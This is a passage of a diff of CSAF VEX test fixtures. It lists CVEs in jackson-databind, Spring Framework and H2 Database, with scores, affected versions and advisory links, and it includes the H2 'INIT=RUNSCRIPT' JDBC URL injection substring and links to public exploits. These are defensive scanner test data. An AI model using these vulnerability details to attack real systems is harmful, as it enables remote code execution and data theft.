edgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36189"]}],"cve":"CVE-2020-36189","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:16:59","ids":[{"system_name":"CVE Record","text":"CVE-2020-36189"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 an 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36189"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36189"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"]}],"title":"CVE-2020-36189/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-35490"]}],"cve":"CVE-2020-35490","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:15:00","ids":[{"system_name":"CVE Record","text":"CVE-2020-35490"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210122-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Serialization gadgets exploit in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Serialization gadgets exploit in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.datasources.PerUserPoolDataSource."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-35490"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-35490"},{"summary":"NetApp Advisory ntap-20210122-0005","url":"https://security.netapp.com/advisory/ntap-20210122-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"]}],"title":"CVE-2020-35490/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"Vmware","urls":["https://tanzu.vmware.com/security/cve-2022-22950"]}],"cve":"CVE-2022-22950","cwe":{"id":"770","name":"Allocation of Resources Without Limits or Throttling"},"discovery_date":"2022-04-03T00:01:00","ids":[{"system_name":"CVE Record","text":"CVE-2022-22950"},{"system_name":"Vmware Advisory","text":"cve-2022-22950"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Allocation of Resources Without Limits or Throttling in Spring Framework"},{"category":"details","details":"Vulnerability Details","text":"# Allocation of Resources Without Limits or Throttling in Spring Framework In Spring Framework versions 5.3.0 - 5.3.16, 5.2.0.RELEASE - 5.2.19.RELEASE, and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition."}],"product_status":{"known_affected":["org.springframework/spring-expression@vers:maven/>=3.0.0.RELEASE|<=5.2.9.RELEASE"]},"references":[{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22950"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22950"},{"summary":"Vmware Advisory cve-2022-22950","url":"https://tanzu.vmware.com/security/cve-2022-22950"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.springframework/spring-expression@vers:maven/>=3.0.0.RELEASE|<=5.2.9.RELEASE"]}],"title":"CVE-2022-22950/pkg:maven/org.springframework/spring-expression@4.3.16.RELEASE?type=jar"},{"cve":"CVE-2023-20861","cwe":{"id":"917","name":"Improper Neutralization of Special Elements used in an Expression Language Statement"},"discovery_date":"2023-03-23T21:30:19","ids":[{"system_name":"CVE Record","text":"CVE-2023-20861"},{"system_name":"NetApp Advisory","text":"ntap-20230420-0007"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Spring Framework vulnerable to denial of service via specially crafted SpEL expression"},{"category":"details","details":"Vulnerability Details","text":"# Spring Framework vulnerable to denial of service via specially crafted SpEL expression In Spring Framework versions 6.0.0 - 6.0.6, 5.3.0 - 5.3.25, 5.2.0.RELEASE - 5.2.22.RELEASE, and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial-of-service (DoS) condition."}],"product_status":{"known_affected":["org.springframework/spring-expression@vers:maven/>=3.0.0.RELEASE|<=5.2.9.RELEASE"]},"references":[{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-20861"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-20861"},{"summary":"NetApp Advisory ntap-20230420-0007","url":"https://security.netapp.com/advisory/ntap-20230420-0007"},{"summary":"Cve 2023","url":"https://spring.io/security/cve-2023-20861"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.springframework/spring-expression@vers:maven/>=3.0.0.RELEASE|<=5.2.9.RELEASE"]}],"title":"CVE-2023-20861/pkg:maven/org.springframework/spring-expression@4.3.16.RELEASE?type=jar"},{"cve":"CVE-2023-20863","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2023-04-13T21:30:27","ids":[{"system_name":"CVE Record","text":"CVE-2023-20863"},{"system_name":"NetApp Advisory","text":"ntap-20240524-0015"}],"notes":[{"audience":"developers","category":"other","text":"Allocation of Resources Without Limits or Throttling","title":"Additional CWE: 770"},{"audience":"developers","category":"other","text":"Improper Neutralization of Special Elements used in an Expression Language Statement","title":"Additional CWE: 917"},{"category":"description","details":"Vulnerability Description","text":"Spring Framework vulnerable to denial of service"},{"category":"details","details":"Vulnerability Details","text":"# Spring Framework vulnerable to denial of service In Spring Framework versions prior to 5.2.24.release+ , 5.3.27+ and 6.0.8+ , it is possible for a user to provide a specially crafted Spring Expression Language (SpEL) expression that may cause a denial-of-service (DoS) condition."}],"product_status":{"known_affected":["org.springframework/spring-expression@vers:maven/>=3.0.0.RELEASE|<=5.2.9.RELEASE"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-20863"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-20863"},{"summary":"NetApp Advisory ntap-20240524-0015","url":"https://security.netapp.com/advisory/ntap-20240524-0015"},{"summary":"Cve 2023","url":"https://spring.io/security/cve-2023-20863"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.springframework/spring-expression@vers:maven/>=3.0.0.RELEASE|<=5.2.9.RELEASE"]}],"title":"CVE-2023-20863/pkg:maven/org.springframework/spring-expression@4.3.16.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-45868"]}],"cve":"CVE-2022-45868","cwe":{"id":"200","name":"Exposure of Sensitive Information to an Unauthorized Actor"},"discovery_date":"2022-11-23T21:30:31","ids":[{"system_name":"CVE Record","text":"CVE-2022-45868"},{"system_name":"GitHub Advisory","text":"GHSA-22wj-vf5f-wrvj"},{"system_name":"Google Advisory","text":"sonatype-2022-6243"}],"notes":[{"audience":"developers","category":"other","text":"Cleartext Storage of Sensitive Information","title":"Additional CWE: 312"},{"category":"description","details":"Vulnerability Description","text":"Password exposure in H2 Database "},{"category":"details","details":"Vulnerability Details","text":"# Password exposure in H2 Database  The web-based admin console in H2 Database Engine through 2.1.214 can be started via the CLI with the argument -webAdminPassword, which allows the user to specify the password in cleartext for the web admin console. Consequently, a local user (or an attacker that has obtained local access through some means) would be able to discover the password by listing processes and their arguments. NOTE: the vendor states \"This is not a vulnerability of H2 Console ... Passwords should never be passed on the command line and every qualified DBA or system administrator is expected to know that.\""}],"product_status":{"known_affected":["com.h2database/h2@vers:maven/>=1.4.198|<2.2.220"],"known_not_affected":["com.h2database/h2@2.2.220"]},"references":[{"summary":"GitHub Advisory GHSA-22wj-vf5f-wrvj","url":"https://github.com/advisories/GHSA-22wj-vf5f-wrvj"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-45868"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-45868"},{"summary":"Google Advisory sonatype-2022-6243","url":"https://sites.google.com/sonatype.com/vulnerabilities/sonatype-2022-6243"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"LOCAL","availabilityImpact":"HIGH","baseScore":7.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":7.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":7.8,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.h2database/h2@vers:maven/>=1.4.198|<2.2.220"]}],"title":"CVE-2022-45868/pkg:maven/com.h2database/h2@1.4.199?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-23221"]}],"cve":"CVE-2022-23221","cwe":{"id":"88","name":"Improper Neutralization of Argument Delimiters in a Command"},"discovery_date":"2022-01-21T23:07:39","ids":[{"system_name":"Twitter Advisory","text":"1483824727936450564"},{"system_name":"CVE Record","text":"CVE-2022-23221"},{"system_name":"GitHub Advisory","text":"advisories"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Debian Advisory","text":"dsa-5076"},{"system_name":"NetApp Advisory","text":"ntap-20230818-0011"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Arbitrary code execution in H2 Console"},{"category":"details","details":"Vulnerability Details","text":"# Arbitrary code execution in H2 Console H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT substring, a different vulnerability than CVE-2021-42392."}],"product_status":{"known_affected":["com.h2database/h2@vers:maven/>=1.0.57|<=2.0.206"],"known_not_affected":["com.h2database/h2@2.1.210"]},"references":[{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165676/H2-Database-Console-Remote-Code-Execution.html"},{"summary":"Seclists Exploit","url":"http://seclists.org/fulldisclosure/2022/Jan/39"},{"summary":"GitHub Advisory advisories","url":"https://github.com/h2database/h2database/security/advisories"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/02/msg00017.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-23221"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-23221"},{"summary":"NetApp Advisory ntap-20230818-0011","url":"https://security.netapp.com/advisory/ntap-20230818-0011"},{"summary":"Twitter Advisory 1483824727936450564","url":"https://twitter.com/d0nkey_man/status/1483824727936450564"},{"summary":"Debian Advisory dsa-5076","url":"https://www.debian.org/security/2022/dsa-5076"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.h2database/h2@vers:maven/>=1.0.57|<=2.0.206"]}],"title":"CVE-2022-23221/pkg:maven/com.h2database/h2@1.4.199?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-23463"]}],"cve":"CVE-2021-23463","cwe":{"id":"611","name":"Improper Restriction of XML External Entity Reference"},"discovery_date":"2021-12-16T14:29:57","ids":[{"system_name":"CVE Record","text":"CVE-2021-23463"},{"system_name":"Snyk Advisory","text":"SNYK-JAVA-COMH2DATABASE-1769238"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"NetApp Advisory","text":"ntap-20230818-0010"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper Restriction of XML External Entity Reference in com.h2database:h2."},{"category":"details","details":"Vulnerability Details","text":"# Improper Restriction of XML External Entity Reference in com.h2database:h2. H2 is an embeddable RDBMS written in Java. The package com.h2database:h2 from 1.4.198 and before 2.0.202 are vulnerable to XML External Entity (XXE) Injection via the org.h2.jdbc.JdbcSQLXML class object, when it receives parsed string data from org.h2.jdbc.JdbcResultSet.getSQLXML() method. If it executes the getSource() method when the parameter is DOMSource.class it will trigger the vulnerability.  ## Related CVE(s) CVE-2021-23463, SNYK-JAVA-COMH2DATABASE-1769238"}],"product_status":{"known_affected":["com.h2database/h2@vers:maven/>=1.4.198|<2.0.202"],"known_not_affected":["com.h2database/h2@2.0.202"]},"references":[{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-23463"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-23463"},{"summary":"NetApp Advisory ntap-20230818-0010","url":"https://security.netapp.com/advisory/ntap-20230818-0010"},{"summary":"Snyk Advisory SNYK-JAVA-COMH2DATABASE-1769238","url":"https://snyk.io/vuln/SNYK-JAVA-COMH2DATABASE-1769238"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H","version":"3.1"},"products":["com.h2database/h2@vers:maven/>=1.4.198|<2.0.202"]}],"title":"CVE-2021-23463/pkg:maven/com.h2database/h2@1.4.199?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-42392"]}],"cve":"CVE-2021-42392","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2022-01-06T23:55:09","ids":[{"system_name":"CVE Record","text":"CVE-2021-42392"},{"system_name":"GitHub Advisory","text":"GHSA-h376-j262-vhq6"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Debian Advisory","text":"dsa-5076"},{"system_name":"Secpod Advisory","text":"log4shell-critical-remote-code-execution-vulnerability-in-h2database-console"},{"system_name":"NetApp Advisory","text":"ntap-20220119-0001"},{"system_name":"JFrog Advisory","text":"the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"RCE in H2 Console"},{"category":"details","details":"Vulnerability Details","text":"# RCE in H2 Console ### Impact H2 Console in versions since 1.1.100 (2008-10-14) to 2.0.204 (2021-12-21) inclusive allows loading of custom classes from remote servers through JNDI.  H2 Console doesn't accept remote connections by default. If remote access was enabled explicitly and some protection method (such as security constraint) wasn't set, an intruder can load own custom class and execute its code in a process with H2 Console (H2 Server process or a web server with H2 Console servlet).  It is also possible to load them by creation a linked table in these versions, but it requires `ADMIN` privileges and user with `ADMIN` privileges has full access to the Java process by design. These privileges should never be granted to untrusted users.  ### Patches Since version 2.0.206 H2 Console and linked tables explicitly forbid attempts to specify LDAP URLs for JNDI. Only local data sources can be used.  ### Workarounds H2 Console should never be available to untrusted users.  `-webAllowOthers` is a dangerous setting that should be avoided.  H2 Console Servlet deployed on a web server can be protected with a security constraint: https://h2database.com/html/tutorial.html#usingH2ConsoleServlet If `webAllowOthers` is specified, you need to uncomment and edit `<security-role>` and `<security-constraint>` as necessary. See documentation of your web server for more details.  ### References This issue was found and privately reported to H2 team by [JFrog Security](https://www.jfrog.com/)'s vulnerability research team with detailed information."}],"product_status":{"known_affected":["com.h2database/h2@vers:maven/>=1.1.100|<2.0.206"],"known_not_affected":["com.h2database/h2@2.0.206"]},"references":[{"summary":"GitHub Advisory GHSA-h376-j262-vhq6","url":"https://github.com/h2database/h2database/security/advisories/GHSA-h376-j262-vhq6"},{"summary":"JFrog Advisory the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console","url":"https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/02/msg00017.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-42392"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-42392"},{"summary":"NetApp Advisory ntap-20220119-0001","url":"https://security.netapp.com/advisory/ntap-20220119-0001"},{"summary":"Debian Advisory dsa-5076","url":"https://www.debian.org/security/2022/dsa-5076"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Secpod Advisory log4shell-critical-remote-code-execution-vulnerability-in-h2database-console","url":"https://www.secpod.com/blog/log4shell-critical-remote-code-execution-vulnerability-in-h2database-console"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.h2database/h2@vers:maven/>=1.1.100|<2.0.206"]}],"title":"CVE-2021-42392/pkg:maven/com.h2database/h2@1.4.199?type=jar"}]}
\ No newline at end of file
diff --git a/test/csaf_4.json b/test/csaf_4.json
new file mode 100644
index 0000000..4a22d71
--- /dev/null
+++ b/test/csaf_4.json
@@ -0,0 +1 @@
+{"document":{"aggregate_severity":{"text":"Critical"},"category":"csaf_vex","csaf_version":"2.0","lang":"en","notes":[{"category":"legal_disclaimer","text":"Depscan reachable code only covers the project source code, not the code of dependencies. A dependency may execute vulnerable code when called even if it is not in the project's source code. Regard the Depscan-set flag of 'code_not_in_execute_path' with this in mind."}],"publisher":{"category":"vendor","contact_details":"vendor@mcvendorson.com","name":"Vendor McVendorson","namespace":"https://appthreat.com"},"references":[{"summary":"website","url":"http://projects.spring.io/spring-boot/java-sec-code/"},{"summary":"vcs","url":"https://github.com/spring-projects/spring-boot/spring-boot-starter-parent/java-sec-code"}],"title":"Your Title","tracking":{"current_release_date":"2024-10-04T02:01:11","id":"2024-10-04T02:01:11_v1","initial_release_date":"2024-10-04T02:01:11","revision_history":[],"status":"draft","version":"1"}},"product_tree":{"full_product_names":[{"name":"java-sec-code","product_id":"java-sec-code:1.0.0","product_identification_helper":{"purl":"pkg:maven/sec/java-sec-code@1.0.0?type=jar"}}]},"vulnerabilities":[{"acknowledgements":[{"organization":"Vmware","urls":["https://tanzu.vmware.com/security/cve-2022-22965"]}],"cve":"CVE-2022-22965","cwe":{"id":"74","name":"Improper Neutralization of Special Elements in Output Used by a Downstream Component"},"discovery_date":"2022-03-31T18:30:50","ids":[{"system_name":"CVE Record","text":"CVE-2022-22965"},{"system_name":"Sonicwall Advisory","text":"SNWLID-2022-0005"},{"system_name":"Cisco Advisory","text":"cisco-sa-java-spring-rce-Zx9GUc67"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Vmware Advisory","text":"cve-2022-22965"},{"system_name":"Siemens Advisory","text":"ssa-254054"}],"notes":[{"audience":"developers","category":"other","text":"Improper Control of Generation of Code","title":"Additional CWE: 94"},{"category":"description","details":"Vulnerability Description","text":"Remote Code Execution in Spring Framework"},{"category":"details","details":"Vulnerability Details","text":"# Remote Code Execution in Spring Framework Spring Framework prior to versions 5.2.20 and 5.3.18 contains a remote code execution vulnerability known as `Spring4Shell`.   ## Impact  A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.  These are the prerequisites for the exploit: - JDK 9 or higher - Apache Tomcat as the Servlet container - Packaged as WAR - `spring-webmvc` or `spring-webflux` dependency  ## Patches  - Spring Framework [5.3.18](https://github.com/spring-projects/spring-framework/releases/tag/v5.3.18) and [5.2.20](https://github.com/spring-projects/spring-framework/releases/tag/v5.2.20.RELEASE) - Spring Boot [2.6.6](https://github.com/spring-projects/spring-boot/releases/tag/v2.6.6) and [2.5.12](https://github.com/spring-projects/spring-boot/releases/tag/v2.5.12)  ## Workarounds  For those who are unable to upgrade, leaked reports recommend setting `disallowedFields` on `WebDataBinder` through an `@ControllerAdvice`. This works generally, but as a centrally applied workaround fix, may leave some loopholes, in particular if a controller sets `disallowedFields` locally through its own `@InitBinder` method, which overrides the global setting.  To apply the workaround in a more fail-safe way, applications could extend `RequestMappingHandlerAdapter` to update the `WebDataBinder` at the end after all other initialization. In order to do that, a Spring Boot application can declare a `WebMvcRegistrations` bean (Spring MVC) or a `WebFluxRegistrations` bean (Spring WebFlux)."}],"product_status":{"known_affected":["org.springframework.boot/spring-boot-starter-web@vers:maven/>=1.0.0.RELEASE|<=2.5.9"]},"references":[{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/166713/Spring4Shell-Code-Execution.html"},{"summary":"Packetstormsecurity 